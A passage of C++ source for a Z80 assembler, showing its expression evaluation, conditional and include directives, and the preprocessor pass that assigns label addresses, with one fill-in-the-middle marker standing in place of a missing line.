THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(
Z80_ASSEMBLER_EXCEPTION_EXPECTING_IDENTIFIER,
tok, true, "%s", CHECK_STR(tok.to_string()));
}
if(m_identifier_map.find(tok.text()) != m_identifier_map.end()) {
evaluate_statement_list(statement,
node.children().at(IF_CONDITIONAL_STMT_MAIN_OFF),
origin, token_factory, node_factory,
exit_condition);
} else if(node.children().size() == IF_CONDITIONAL_COUNT_MAX) {
evaluate_statement_list(statement,
node.children().at(IF_CONDITIONAL_STMT_AUX_OFF),
origin, token_factory, node_factory,
exit_condition);
}
} break;
case DIRECTIVE_INCLUDE:
break;
case DIRECTIVE_INCLUDE_BINARY: {
tok = z80_parser::acquire_token(statement, ++offset,
token_factory, node_factory);
if(tok.type() != TOKEN_LITERAL_STRING) {
THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(
Z80_ASSEMBLER_EXCEPTION_EXPECTING_LITERAL_STRING,
tok, true, "%s", CHECK_STR(tok.to_string()));
}
std::ifstream file(z80_lexer_base::base_path() + tok.text(),
std::ios::in | std::ios::binary);
if(!file) {
THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(
Z80_ASSEMBLER_EXCEPTION_FILE_NOT_FOUND,
tok, true, "%s", CHECK_STR(tok.to_string()));
}
file.seekg(0, std::ios::end);
len = file.tellg();
file.seekg(0, std::ios::beg);
for(; count < len; ++count) {
if(file.eof()) {
break;
}
m_binary.push_back(file.get());
}
file.close();
origin += len;
} break;
case DIRECTIVE_ORIGIN:
tok = z80_parser::acquire_token(statement, ++offset,
token_factory, node_factory);
if(tok.type() != TOKEN_IMMEDIATE) {
THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(
Z80_ASSEMBLER_EXCEPTION_EXPECTING_IMMEDIATE,
tok, true, "%s", CHECK_STR(tok.to_string()));
}
origin = tok.value();
break;
case DIRECTIVE_UNDEFINE:
tok = z80_parser::acquire_token(statement, ++offset,
token_factory, node_factory);
if(tok.type() != TOKEN_IDENTIFIER) {
THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(
Z80_ASSEMBLER_EXCEPTION_EXPECTING_IDENTIFIER,
tok, true, "%s", CHECK_STR(tok.to_string()));
}
iter = m_identifier_map.find(tok.text());
if(iter == m_identifier_map.end()) {
THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(
Z80_ASSEMBLER_EXCEPTION_UNDEFINED_DEFINITION,
tok, true, "%s", CHECK_STR(tok.to_string()));
}
m_identifier_map.erase(iter);
break;
default:
THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(
Z80_ASSEMBLER_EXCEPTION_INVALID_DIRECTIVE,
tok, true, "%s", CHECK_STR(tok.to_string()));
}
TRACE_EXIT("Return Value: off: %lu, org: 0x%04x, exit: 0x%x", offset, origin, exit);
}
uint16_t
_z80_assembler::evaluate_expression(
__in const z80_stmt_t &statement,
__inout size_t &offset,
__inout uint16_t &origin,
__in z80_token_factory_ptr token_factory,
__in z80_node_factory_ptr node_factory
)
{
z80_token tok;
uint16_t result = 0;
size_t expr_off = offset;
bool expr_header = false;
z80_node_child_lst_t::iterator child_iter;
TRACE_ENTRY();
SERIALIZE_CALL_RECUR(m_lock);
if(!token_factory || !node_factory) {
THROW_Z80_ASSEMBLER_EXCEPTION(Z80_ASSEMBLER_EXCEPTION_INTERNAL_EXCEPTION);
}
tok = z80_parser::acquire_token(statement, offset, token_factory,
node_factory);
z80_node node = z80_parser::acquire_node(statement, offset, node_factory);
if(tok.type() == TOKEN_EXPRESSION) {
expr_header = true;
if(node.children().size() < EXPRESSION_COUNT_MIN) {
THROW_Z80_ASSEMBLER_EXCEPTION(Z80_ASSEMBLER_EXCEPTION_INTERNAL_EXCEPTION);
}
expr_off = node.children().at(EXPRESSION_LEFT_OFF);
tok = z80_parser::acquire_token(statement, expr_off, token_factory,
node_factory);
}
switch(tok.type()) {
case TOKEN_EXPRESSION:
result = evaluate_expression(statement, expr_off, origin, token_factory,
node_factory);
break;
case TOKEN_MACRO: {
z80_node node = z80_parser::acquire_node(statement, expr_off, node_factory);
if(node.children().size() != MACRO_COUNT) {
THROW_Z80_ASSEMBLER_EXCEPTION(Z80_ASSEMBLER_EXCEPTION_INTERNAL_EXCEPTION);
}
result = evaluate_expression(statement, node.children().at(MACRO_CHILD_OFF),
origin, token_factory, node_factory);
switch(tok.subtype()) {
case MACRO_HIGH:
result = (result >> BITS_PER_BYTE) & UINT8_MAX;
break;
case MACRO_LOW:
result = result & UINT8_MAX;
break;
case MACRO_WORD:
break;
default:
THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(
Z80_ASSEMBLER_EXCEPTION_INVALID_MACRO,
tok, true, "%s", CHECK_STR(tok.to_string()));
}
} break;
case TOKEN_SYMBOL: {
z80_node node = z80_parser::acquire_node(statement, expr_off, node_factory);
if(node.children().size() != UNARY_OPERATOR_COUNT) {
THROW_Z80_ASSEMBLER_EXCEPTION(Z80_ASSEMBLER_EXCEPTION_INTERNAL_EXCEPTION);
}
result = evaluate_expression(statement, node.children().at(UNARY_OPERATOR_CHILD_OFF),
origin, token_factory, node_factory);
switch(tok.subtype()) {
case SYMBOL_ARITHMETIC_SUBTRACTION:
result *= -1;
break;
case SYMBOL_UNARY_NOT:
result = !result;
break;
default:
THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(
Z80_ASSEMBLER_EXCEPTION_INVALID_UNARY_OPERATOR,
tok, true, "%s", CHECK_STR(tok.to_string()));
}
} break;
default:
result = evaluate_expression_terminal(statement, expr_off, origin, token_factory,
node_factory);
break;
}
if(expr_header &&
(node.children().size() > EXPRESSION_COUNT_MIN)) {
for(child_iter = node.children().begin() + EXPRESSION_RIGHT_OFF;
child_iter != node.children().end(); ++child_iter) {
result = evaluate_expression_operator(statement, *child_iter, origin,
token_factory, node_factory, result);
}
}
TRACE_EXIT("Return Value: 0x%04x (off: %lu, org: 0x%04x)", result, offset, origin);
return result;
}
bool
_z80_assembler::evaluate_expression_conditional(
__in const z80_stmt_t &statement,
__inout size_t &offset,
__inout uint16_t &origin,
__in z80_token_factory_ptr token_factory,
__in z80_node_factory_ptr node_factory
)
{
z80_token tok;
bool result = false;
uint16_t left, right;
<|fim▁hole|> SERIALIZE_CALL_RECUR(m_lock);
if(!token_factory || !node_factory) {
THROW_Z80_ASSEMBLER_EXCEPTION(Z80_ASSEMBLER_EXCEPTION_INTERNAL_EXCEPTION);
}
tok = z80_parser::acquire_token(statement, offset, token_factory,
node_factory);
if(tok.type() != TOKEN_EXPRESSION_CONDITIONAL) {
THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(
Z80_ASSEMBLER_EXCEPTION_EXPECTING_EXPRESSION_CONDITIONAL,
tok, true, "%s", CHECK_STR(tok.to_string()));
}
z80_node node = z80_parser::acquire_node(statement, offset, node_factory);
if(node.children().size() != COND_EXPRESSION_COUNT) {
THROW_Z80_ASSEMBLER_EXCEPTION(Z80_ASSEMBLER_EXCEPTION_INTERNAL_EXCEPTION);
}
left = evaluate_expression(statement, node.children().at(COND_EXPRESSION_OPERAND_LEFT),
origin, token_factory, node_factory);
right = evaluate_expression(statement, node.children().at(COND_EXPRESSION_OPERAND_RIGHT),
origin, token_factory, node_factory);
tok = z80_parser::acquire_token(statement, node.children().at(COND_EXPRESSION_OPERATOR),
token_factory, node_factory);
if(tok.type() != TOKEN_SYMBOL) {
THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(
Z80_ASSEMBLER_EXCEPTION_EXPECTING_OPERATOR,
tok, true, "%s", CHECK_STR(tok.to_string()));
}
switch(tok.subtype()) {
case SYMBOL_EQUALS:
result = (left == right);
break;
case SYMBOL_GREATER_THAN:
result = (left > right);
break;
case SYMBOL_GREATER_THAN_EQUALS:
result = (left >= right);
break;
case SYMBOL_LESS_THAN:
result = (left < right);
break;
case SYMBOL_LESS_THAN_EQUALS:
result = (left <= right);
break;
case SYMBOL_NOT_EQUALS:
result = (left != right);
break;
default:
THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(
Z80_ASSEMBLER_EXCEPTION_INVALID_OPERATOR,
tok, true, "%s", CHECK_STR(tok.to_string()));
}
TRACE_EXIT("Return Value: 0x%x (off: %lu, org: 0x%04x)", result, offset, origin);
return result;
}
void
_z80_assembler::evaluate_expression_list(
__in const z80_stmt_t &statement,
__inout size_t &offset,
__inout uint16_t &origin,
__in z80_token_factory_ptr token_factory,
__in z80_node_factory_ptr node_factory,
__inout bool &exit_condition,
__in_opt bool wide
)
{
uint16_t val;
z80_token tok;
std::string::iterator str_iter;
z80_node_child_lst_t::iterator iter;
TRACE_ENTRY();
SERIALIZE_CALL_RECUR(m_lock);
if(!token_factory || !node_factory) {
THROW_Z80_ASSEMBLER_EXCEPTION(Z80_ASSEMBLER_EXCEPTION_INTERNAL_EXCEPTION);
}
tok = z80_parser::acquire_token(statement, offset, token_factory,
node_factory);
if(tok.type() != TOKEN_EXPRESSION_LIST) {
THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(Z80_ASSEMBLER_EXCEPTION_EXPECTING_EXPRESSION_LIST,
tok, true, "%s", CHECK_STR(tok.to_string()));
}
z80_node node = z80_parser::acquire_node(statement, offset, node_factory);
for(iter = node.children().begin(); iter != node.children().end(); ++iter) {
tok = z80_parser::acquire_token(statement, *iter, token_factory,
node_factory);
switch(tok.type()) {
case TOKEN_LITERAL_STRING:
for(str_iter = tok.text().begin(); str_iter != tok.text().end();
++str_iter) {
if(wide) {
m_binary.push_back(0);
origin += sizeof(uint8_t);
}
m_binary.push_back(*str_iter);
origin += sizeof(uint8_t);
}
break;
default:
val = evaluate_expression(statement, *iter, origin,
token_factory, node_factory);
if(wide) {
m_binary.push_back((val >> BITS_PER_BYTE) & UINT8_MAX);
origin += sizeof(uint8_t);
}
m_binary.push_back(val & UINT8_MAX);
origin += sizeof(uint8_t);
break;
}
}
TRACE_EXIT("Return Value: off: %lu, org: 0x%04x, exit: 0x%x", offset, origin, exit_condition);
}
uint16_t
_z80_assembler::evaluate_expression_operator(
__in const z80_stmt_t &statement,
__inout size_t &offset,
__inout uint16_t &origin,
__in z80_token_factory_ptr token_factory,
__in z80_node_factory_ptr node_factory,
__in uint16_t current
)
{
z80_token tok;
uint16_t result = 0, right_result;
z80_node_child_lst_t::iterator child_iter;
TRACE_ENTRY();
SERIALIZE_CALL_RECUR(m_lock);
if(!token_factory || !node_factory) {
THROW_Z80_ASSEMBLER_EXCEPTION(Z80_ASSEMBLER_EXCEPTION_INTERNAL_EXCEPTION);
}
tok = z80_parser::acquire_token(statement, offset, token_factory,
node_factory);
if(tok.type() != TOKEN_SYMBOL) {
THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(
Z80_ASSEMBLER_EXCEPTION_EXPECTING_OPERATOR,
tok, true, "%s", CHECK_STR(tok.to_string()));
}
z80_node node = z80_parser::acquire_node(statement, offset, node_factory);
if(node.children().size() < OPERATOR_COUNT) {
THROW_Z80_ASSEMBLER_EXCEPTION(Z80_ASSEMBLER_EXCEPTION_INTERNAL_EXCEPTION);
}
right_result = evaluate_expression(statement, node.children().at(OPERATOR_CHILD_OFF),
origin, token_factory, node_factory);
if(node.children().size() > OPERATOR_COUNT) {
for(child_iter = node.children().begin() + OPERATOR_COUNT;
child_iter != node.children().end();
++child_iter) {
result += evaluate_expression_operator(statement, *child_iter,
origin, token_factory, node_factory,
right_result);
}
} else {
switch(tok.subtype()) {
case SYMBOL_ARITHMETIC_ADDITION:
result = current + right_result;
break;
case SYMBOL_ARITHMETIC_DIVISION:
result = current / right_result;
break;
case SYMBOL_ARITHMETIC_MODULUS:
result = current % right_result;
break;
case SYMBOL_ARITHMETIC_MULTIPLICATION:
result = current * right_result;
break;
case SYMBOL_ARITHMETIC_SUBTRACTION:
result = current - right_result;
break;
case SYMBOL_BINARY_AND:
result = current & right_result;
break;
case SYMBOL_BINARY_OR:
result = current | right_result;
break;
case SYMBOL_BINARY_XOR:
result = current ^ right_result;
break;
case SYMBOL_SHIFT_LEFT:
result = current << right_result;
break;
case SYMBOL_SHIFT_RIGHT:
result = current >> right_result;
break;
default:
THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(
Z80_ASSEMBLER_EXCEPTION_INVALID_OPERATOR,
tok, true, "%s", CHECK_STR(tok.to_string()));
}
}
TRACE_EXIT("Return Value: 0x%04x (off: %lu, org: 0x%04x, curr: %lu)", result,
offset, origin, current);
return result;
}
uint16_t
_z80_assembler::evaluate_expression_terminal(
__in const z80_stmt_t &statement,
__inout size_t &offset,
__inout uint16_t &origin,
__in z80_token_factory_ptr token_factory,
__in z80_node_factory_ptr node_factory
)
{
z80_token tok;
uint16_t result = 0;
z80_lst_t::iterator iter;
TRACE_ENTRY();
SERIALIZE_CALL_RECUR(m_lock);
if(!token_factory || !node_factory) {
THROW_Z80_ASSEMBLER_EXCEPTION(Z80_ASSEMBLER_EXCEPTION_INTERNAL_EXCEPTION);
}
tok = z80_parser::acquire_token(statement, offset, token_factory,
node_factory);
switch(tok.type()) {
case TOKEN_CONSTANT:
result = tok.subtype();
break;
case TOKEN_IDENTIFIER:
iter = m_identifier_map.find(tok.text());
if(iter == m_identifier_map.end()) {
iter = m_label_map.find(tok.text());
if(iter == m_label_map.end()) {
THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(
Z80_ASSEMBLER_EXCEPTION_UNDEFINED_DEFINITION,
tok, true, "%s", CHECK_STR(tok.to_string()));
}
}
result = iter->second;
break;
case TOKEN_IMMEDIATE:
case TOKEN_LITERAL_CHARACTER:
result = tok.value();
break;
default:
THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(
Z80_ASSEMBLER_EXCEPTION_INVALID_EXPRESSION_TERMINAL,
tok, true, "%s", CHECK_STR(tok.to_string()));
}
TRACE_EXIT("Return Value: 0x%04x (off: %lu, org: 0x%04x)", result, offset, origin);
return result;
}
void
_z80_assembler::evaluate_preprocessor_command(
__in const z80_stmt_t &statement,
__inout size_t &offset,
__inout uint16_t &origin,
__in z80_token_factory_ptr token_factory,
__in z80_node_factory_ptr node_factory,
__inout bool &exit_condition
)
{
z80_token tok;
TRACE_ENTRY();
SERIALIZE_CALL_RECUR(m_lock);
if(!token_factory || !node_factory) {
THROW_Z80_ASSEMBLER_EXCEPTION(Z80_ASSEMBLER_EXCEPTION_INTERNAL_EXCEPTION);
}
tok = z80_parser::acquire_token(statement, offset, token_factory,
node_factory);
if(tok.type() != TOKEN_CODE) {
THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(Z80_ASSEMBLER_EXCEPTION_EXPECTING_COMMAND,
tok, true, "%s", CHECK_STR(tok.to_string()));
}
origin += tok.length();
TRACE_EXIT("Return Value: off: %lu, org: 0x%04x, exit: 0x%x", offset, origin, exit_condition);
}
void
_z80_assembler::evaluate_preprocessor_directive(
__in const z80_stmt_t &statement,
__inout size_t &offset,
__inout uint16_t &origin,
__in z80_token_factory_ptr token_factory,
__in z80_node_factory_ptr node_factory,
__in const std::string &base_path,
__inout bool &exit_condition
)
{
z80_token tok;
size_t len, pos;
std::string text;
z80_lst_t::iterator iter;
TRACE_ENTRY();
SERIALIZE_CALL_RECUR(m_lock);
if(!token_factory || !node_factory) {
THROW_Z80_ASSEMBLER_EXCEPTION(Z80_ASSEMBLER_EXCEPTION_INTERNAL_EXCEPTION);
}
tok = z80_parser::acquire_token(statement, offset, token_factory,
node_factory);
if(tok.type() != TOKEN_DIRECTIVE) {
THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(Z80_ASSEMBLER_EXCEPTION_EXPECTING_DIRECTIVE,
tok, true, "%s", CHECK_STR(tok.to_string()));
}
switch(tok.subtype()) {
case DIRECTIVE_DEFINE:
tok = z80_parser::acquire_token(statement, ++offset,
token_factory, node_factory);
if(tok.type() != TOKEN_IDENTIFIER) {
THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(
Z80_ASSEMBLER_EXCEPTION_EXPECTING_IDENTIFIER,
tok, true, "%s", CHECK_STR(tok.to_string()));
}
text = tok.text();
iter = m_identifier_map.find(text);
if(iter != m_identifier_map.end()) {
THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(
Z80_ASSEMBLER_EXCEPTION_DUPLICATE_DEFINITION,
tok, true, "%s", CHECK_STR(tok.to_string()));
}
m_identifier_map.insert(std::pair<std::string, uint16_t>(text,
evaluate_expression(statement, ++offset, origin,
token_factory, node_factory)));
break;
case DIRECTIVE_DEFINE_BYTE:
case DIRECTIVE_DEFINE_WORD:
evaluate_preprocessor_expression_list(statement, ++offset, origin, token_factory,
node_factory, exit_condition, tok.subtype() == DIRECTIVE_DEFINE_WORD);
break;
case DIRECTIVE_DEFINE_SPACE: {
z80_node node = z80_parser::acquire_node(statement, offset, node_factory);
if(node.children().size() != DEFS_EXPRESSION_COUNT) {
THROW_Z80_ASSEMBLER_EXCEPTION(Z80_ASSEMBLER_EXCEPTION_INTERNAL_EXCEPTION);
}
origin += evaluate_expression(statement, node.children().at(DEFS_EXPRESSION_OFFSET),
origin, token_factory, node_factory);
} break;
case DIRECTIVE_END_SEGMENT:
exit_condition = true;
break;
case DIRECTIVE_IF_CONDITIONAL: {
z80_node node = z80_parser::acquire_node(statement, offset, node_factory);
if((node.children().size() < IF_CONDITIONAL_COUNT_MIN)
|| (node.children().size() > IF_CONDITIONAL_COUNT_MAX)) {
THROW_Z80_ASSEMBLER_EXCEPTION(Z80_ASSEMBLER_EXCEPTION_INTERNAL_EXCEPTION);
}
if(evaluate_expression_conditional(statement,
node.children().at(IF_CONDITIONAL_ID_OFF),
origin, token_factory, node_factory)) {
evaluate_preprocessor_statement_list(statement,
node.children().at(IF_CONDITIONAL_STMT_MAIN_OFF),
origin, token_factory, node_factory,
exit_condition);
} else if(node.children().size() == IF_CONDITIONAL_COUNT_MAX) {
evaluate_preprocessor_statement_list(statement,
node.children().at(IF_CONDITIONAL_STMT_AUX_OFF),
origin, token_factory, node_factory,
exit_condition);
}
} break;
case DIRECTIVE_IF_DEFINED: {
z80_node node = z80_parser::acquire_node(statement, offset, node_factory);
if((node.children().size() < IF_CONDITIONAL_COUNT_MIN)
|| (node.children().size() > IF_CONDITIONAL_COUNT_MAX)) {
THROW_Z80_ASSEMBLER_EXCEPTION(Z80_ASSEMBLER_EXCEPTION_INTERNAL_EXCEPTION);
}
tok = z80_parser::acquire_token(statement, node.children().at(IF_CONDITIONAL_ID_OFF),
token_factory, node_factory);
if(tok.type() != TOKEN_IDENTIFIER) {
THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(
Z80_ASSEMBLER_EXCEPTION_EXPECTING_IDENTIFIER,
tok, true, "%s", CHECK_STR(tok.to_string()));
}
if(m_identifier_map.find(tok.text()) != m_identifier_map.end()) {
evaluate_preprocessor_statement_list(statement,
node.children().at(IF_CONDITIONAL_STMT_MAIN_OFF),
origin, token_factory, node_factory,
exit_condition);
} else if(node.children().size() == IF_CONDITIONAL_COUNT_MAX) {
evaluate_preprocessor_statement_list(statement,
node.children().at(IF_CONDITIONAL_STMT_AUX_OFF),
origin, token_factory, node_factory,
exit_condition);
}
} break;
case DIRECTIVE_INCLUDE: {
tok = z80_parser::acquire_token(statement, ++offset,
token_factory, node_factory);
if(tok.type() != TOKEN_LITERAL_STRING) {
THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(
Z80_ASSEMBLER_EXCEPTION_EXPECTING_LITERAL_STRING,
tok, true, "%s", CHECK_STR(tok.to_string()));
}
z80_parser par(z80_lexer_base::base_path() + tok.text(), true);
par.discover();
if(par.size()) {
pos = position();
if(par.statement() == par.statement_begin()) {
par.move_next_statement();
}
while(par.has_next_statement()) {
insert_statement(par.statement(), ++pos);
par.move_next_statement();
}
}
} break;
case DIRECTIVE_INCLUDE_BINARY: {
tok = z80_parser::acquire_token(statement, ++offset,
token_factory, node_factory);
if(tok.type() != TOKEN_LITERAL_STRING) {
THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(
Z80_ASSEMBLER_EXCEPTION_EXPECTING_LITERAL_STRING,
tok, true, "%s", CHECK_STR(tok.to_string()));
}
std::ifstream file(z80_lexer_base::base_path() + tok.text(),
std::ios::in | std::ios::binary);
if(!file) {
THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(
Z80_ASSEMBLER_EXCEPTION_FILE_NOT_FOUND,
tok, true, "%s", CHECK_STR(tok.to_string()));
}
file.seekg(0, std::ios::end);
len = file.tellg();
file.close();
origin += len;
} break;
case DIRECTIVE_ORIGIN:
tok = z80_parser::acquire_token(statement, ++offset,
token_factory, node_factory);
if(tok.type() != TOKEN_IMMEDIATE) {
THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(
Z80_ASSEMBLER_EXCEPTION_EXPECTING_IMMEDIATE,
tok, true, "%s", CHECK_STR(tok.to_string()));
}
origin = tok.value();
break;
case DIRECTIVE_UNDEFINE:
tok = z80_parser::acquire_token(statement, ++offset,
token_factory, node_factory);
if(tok.type() != TOKEN_IDENTIFIER) {
THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(
Z80_ASSEMBLER_EXCEPTION_EXPECTING_IDENTIFIER,
tok, true, "%s", CHECK_STR(tok.to_string()));
}
iter = m_identifier_map.find(tok.text());
if(iter == m_identifier_map.end()) {
THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(
Z80_ASSEMBLER_EXCEPTION_UNDEFINED_DEFINITION,
tok, true, "%s", CHECK_STR(tok.to_string()));
}
m_identifier_map.erase(iter);
break;
default:
THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(
Z80_ASSEMBLER_EXCEPTION_INVALID_DIRECTIVE,
tok, true, "%s", CHECK_STR(tok.to_string()));
}
TRACE_EXIT("Return Value: off: %lu, org: 0x%04x, exit: 0x%x", offset, origin, exit_condition);
}
void
_z80_assembler::evaluate_preprocessor_expression_list(
__in const z80_stmt_t &statement,
__inout size_t &offset,
__inout uint16_t &origin,
__in z80_token_factory_ptr token_factory,
__in z80_node_factory_ptr node_factory,
__inout bool &exit_condition,
__in_opt bool wide
)
{
z80_token tok;
z80_node_child_lst_t::iterator iter;
TRACE_ENTRY();
SERIALIZE_CALL_RECUR(m_lock);
if(!token_factory || !node_factory) {
THROW_Z80_ASSEMBLER_EXCEPTION(Z80_ASSEMBLER_EXCEPTION_INTERNAL_EXCEPTION);
}
tok = z80_parser::acquire_token(statement, offset, token_factory,
node_factory);
if(tok.type() != TOKEN_EXPRESSION_LIST) {
THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(Z80_ASSEMBLER_EXCEPTION_EXPECTING_EXPRESSION_LIST,
tok, true, "%s", CHECK_STR(tok.to_string()));
}
z80_node node = z80_parser::acquire_node(statement, offset, node_factory);
for(iter = node.children().begin(); iter != node.children().end(); ++iter) {
tok = z80_parser::acquire_token(statement, *iter, token_factory,
node_factory);
switch(tok.type()) {
case TOKEN_LITERAL_STRING:
origin += (wide ? (sizeof(uint16_t) * tok.text().size()) : tok.text().size());
break;
default:
origin += (wide ? sizeof(uint16_t) : sizeof(uint8_t));
break;
}
}
TRACE_EXIT("Return Value: off: %lu, org: 0x%04x, exit: 0x%x", offset, origin, exit_condition);
}
void
_z80_assembler::evaluate_preprocessor_label(
__in const z80_stmt_t &statement,
__inout size_t &offset,
__inout uint16_t &origin,
__in z80_token_factory_ptr token_factory,
__in z80_node_factory_ptr node_factory,
__inout bool &exit_condition
)
{
z80_token tok;
TRACE_ENTRY();
SERIALIZE_CALL_RECUR(m_lock);
if(!token_factory || !node_factory) {
THROW_Z80_ASSEMBLER_EXCEPTION(Z80_ASSEMBLER_EXCEPTION_INTERNAL_EXCEPTION);
}
tok = z80_parser::acquire_token(statement, offset, token_factory,
node_factory);
if(tok.type() != TOKEN_LABEL) {
THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(Z80_ASSEMBLER_EXCEPTION_EXPECTING_LABEL,
tok, true, "%s", CHECK_STR(tok.to_string()));
}
if(m_label_map.find(tok.text()) != m_label_map.end()) {
THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(Z80_ASSEMBLER_EXCEPTION_DUPLICATE_LABEL,
tok, true, "%s", CHECK_STR(tok.to_string()));
}
m_label_map.insert(std::pair<std::string, uint16_t>(tok.text(), origin));
TRACE_EXIT("Return Value: off: %lu, org: 0x%04x, exit: 0x%x", offset, origin, exit_condition);
}
void
_z80_assembler::evaluate_preprocessor_statement(
__in const z80_stmt_t &statement,
__inout size_t &offset,
__inout uint16_t &origin,
__in z80_token_factory_ptr token_factory,
__in z80_node_factory_ptr node_factory,
__inout bool &exit_condition
)
{
z80_token tok;
TRACE_ENTRY();
SERIALIZE_CALL_RECUR(m_lock);
if(!token_factory || !node_factory) {
THROW_Z80_ASSEMBLER_EXCEPTION(Z80_ASSEMBLER_EXCEPTION_INTERNAL_EXCEPTION);
}
if(!statement.empty()) {
tok = z80_parser::acquire_token(statement, offset, token_factory,
node_factory);
if(tok.type() != TOKEN_STATEMENT) {
THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(
Z80_ASSEMBLER_EXCEPTION_MALFORMED_STATEMENT,
tok, true, "%s", CHECK_STR(tok.to_string()));
}
tok = z80_parser::acquire_token(statement, ++offset, token_factory,
node_factory);
switch(tok.type()) {
case TOKEN_CODE:
evaluate_preprocessor_command(statement, offset, origin,
token_factory, node_factory,
exit_condition);
break;
case TOKEN_DIRECTIVE:
evaluate_preprocessor_directive(statement, offset, origin,
token_factory, node_factory,
z80_lexer_base::base_path(),
exit_condition);
break;
case TOKEN_LABEL:
evaluate_preprocessor_label(statement, offset, origin,
token_factory, node_factory,
exit_condition);
break;
default:
THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(
Z80_ASSEMBLER_EXCEPTION_INVALID_STATEMENT,
tok, true, "%s", CHECK_STR(tok.to_string()));
}
}
TRACE_EXIT("Return Value: off: %lu, org: 0x%04x, exit: 0x%x", offset, origin, exit_condition);
}
void
_z80_assembler::evaluate_preprocessor_statement_list(
__in const z80_stmt_t &statement,
__inout size_t &offset,
__inout uint16_t &origin,
__in z80_token_factory_ptr token_factory,
__in z80_node_factory_ptr node_factory,
__inout bool &exit_condition
)
{
z80_token tok;
z80_node_child_lst_t::iterator iter;
TRACE_ENTRY();
SERIALIZE_CALL_RECUR(m_lock);
if(!token_factory || !node_factory) {
THROW_Z80_ASSEMBLER_EXCEPTION(Z80_ASSEMBLER_EXCEPTION_INTERNAL_EXCEPTION);
}
tok = z80_parser::acquire_token(statement, offset, token_factory,
node_factory);
if(tok.type() != TOKEN_STATEMENT_LIST) {
THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(
Z80_ASSEMBLER_EXCEPTION_EXPECTING_STATEMENT_LIST,
tok, true, "%s", CHECK_STR(tok.to_string()));
}
z80_node node = z80_parser::acquire_node(statement, offset, node_factory);
for(iter = node.children().begin(); iter != node.children().end(); ++iter) {
evaluate_preprocessor_statement(statement, *iter, origin, token_factory,
node_factory, exit_condition);
}
TRACE_EXIT("Return Value: off: %lu, org: 0x%04x, exit: 0x%x", offset, origin, exit_condition);
}
void
_z80_assembler::evaluate_statement(
__in const z80_stmt_t &statement,
__inout size_t &offset,
__inout uint16_t &origin,
__in z80_token_factory_ptr token_factory,
__in z80_node_factory_ptr node_factory,
__inout bool &exit_condition
)
{
z80_token tok;
TRACE_ENTRY();
SERIALIZE_CALL_RECUR(m_lock);
if(!statement.empty()) {
tok = z80_parser::acquire_token(statement, offset, token_factory,
node_factory);
if(tok.type() != TOKEN_STATEMENT) {
THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(
Z80_ASSEMBLER_EXCEPTION_MALFORMED_STATEMENT,
tok, true, "%s", CHECK_STR(tok.to_string()));
}
tok = z80_parser::acquire_token(statement, ++offset, token_factory,
node_factory);
switch(tok.type()) {
case TOKEN_CODE:
evaluate_command(statement, offset, origin, token_factory,
node_factory, exit_condition);
break;
case TOKEN_DIRECTIVE:
evaluate_directive(statement, offset, origin, token_factory,
node_factory, z80_lexer_base::base_path(),
exit_condition);
break;
case TOKEN_LABEL:
break;
default:
THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(
Z80_ASSEMBLER_EXCEPTION_INVALID_STATEMENT,
tok, true, "%s", CHECK_STR(tok.to_string()));
}
}
TRACE_EXIT("Return Value: off: %lu, org: 0x%04x, exit: 0x%x", offset, origin, exit_condition);
}
void
_z80_assembler::evaluate_statement_list(
__in const z80_stmt_t &statement,
__inout size_t &offset,
__inout uint16_t &origin,
__in z80_token_factory_ptr token_factory,
__in z80_node_factory_ptr node_factory,
__inout bool &exit_condition
)
{
z80_token tok;
z80_node_child_lst_t::iterator iter;
TRACE_ENTRY();
SERIALIZE_CALL_RECUR(m_lock);
if(!token_factory || !node_factory) {
THROW_Z80_ASSEMBLER_EXCEPTION(Z80_ASSEMBLER_EXCEPTION_INTERNAL_EXCEPTION);
}
tok = z80_parser::acquire_token(statement, offset, token_factory,
node_factory);
if(tok.type() != TOKEN_STATEMENT_LIST) {
THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(
